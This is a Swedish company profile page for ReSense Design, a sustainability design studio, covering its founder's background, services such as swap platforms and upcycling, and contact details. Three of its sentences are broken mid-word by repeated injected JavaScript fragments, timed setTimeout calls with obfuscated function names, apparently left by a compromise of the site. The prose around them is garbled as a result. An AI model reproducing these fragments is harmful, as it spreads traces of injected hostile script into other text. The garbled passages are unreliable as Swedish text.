ReSense Design

Erika BergströmResense Designs företagsidé är att stärka värdet i våra kunders varumärke genom att skapa design som utvecklar och kommunicerar deras miljöarbete.

Genom kreativa lösningar hjälper vi våra kunder uppfylla omvärldens växandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ande förväntningar inom hållbarhetsarbete och framträda som ett ansvarstagandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ande företag. Hur ett företag profilerar sig inom hållbarhet är tillsammans med pris och kvalité de viktigaste faktorerna när konsumenten väljer ett varumärke över ett annat.

Bakgrund

Resense design har startat i början av 2013 av Erika Bergström.
Hon tog i juni 2012 examen vid Linnéuniversitetets designprogram i Pukeberg, Nybro. Inom utbildningen gjorde hon hösten 2011 en utbytestermin vid Lessius, Mechelen, Belgien, och läste då interiördesign för att bredda sitt kunskapsområde inom design.

Hösten 2012 arbetade hon på Studio Wessels-Boer i Amsterdam. En design- och konst studio som specialiserat sig på det offentliga rummet och genomfört flera stora uppdrag. Under halvåret i Amsterdam har hon lärt sig om att självständigt driva en kreativ process och är nu redo inför nästa utmaning; Att starta sin eget företag inom det designområde hon brinner för; design som involverar och inspirerar till hållbarhet.

Tjänsteområden

 Resense Designs målsättning är att skapa tjänster och produkter som kommunicerar hållbarhet och inspirerar till en mer miljömedveten livsstil.

BYTESPLATTFORM. Ett designat utrymme där de boende i ett bostadsområde kan byta föremål med varandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andra. Bostadsbolaget som anlitat Resense Design för att utföra formgivningen av den specifika Bytesplattformen kan därigenom marknadsföra hur de arbetar för att minska hushållens avfallsmäng och informera om problematiken.

 ÅTERBRUK. Från företags produktionsspill kan nya produkter tas fram genom design. Det ger dels intäkter till produktionsföretaget genom marknadsföring och försäljning. Och dels minskar det kostnader då mindre mängd behöver gå till avfallshantering. Det kan även vara ett alternativ när ombyggnation sker på ett kontor eller bostadsområde, att hitta nya användningsområden istället för att slänga.

 MONTER/MÄSSA. Nya kreativa monterlösningar som är lätta att transporter, resurseffektiva och skapar uppmärksamhet åt er monter genom sitt unika utseende.

resense-designKontaktuppgifter

Erika Bergström

Telefonnr: 073-776 90 41

erika@resensedesign.se

www.resensedesign.se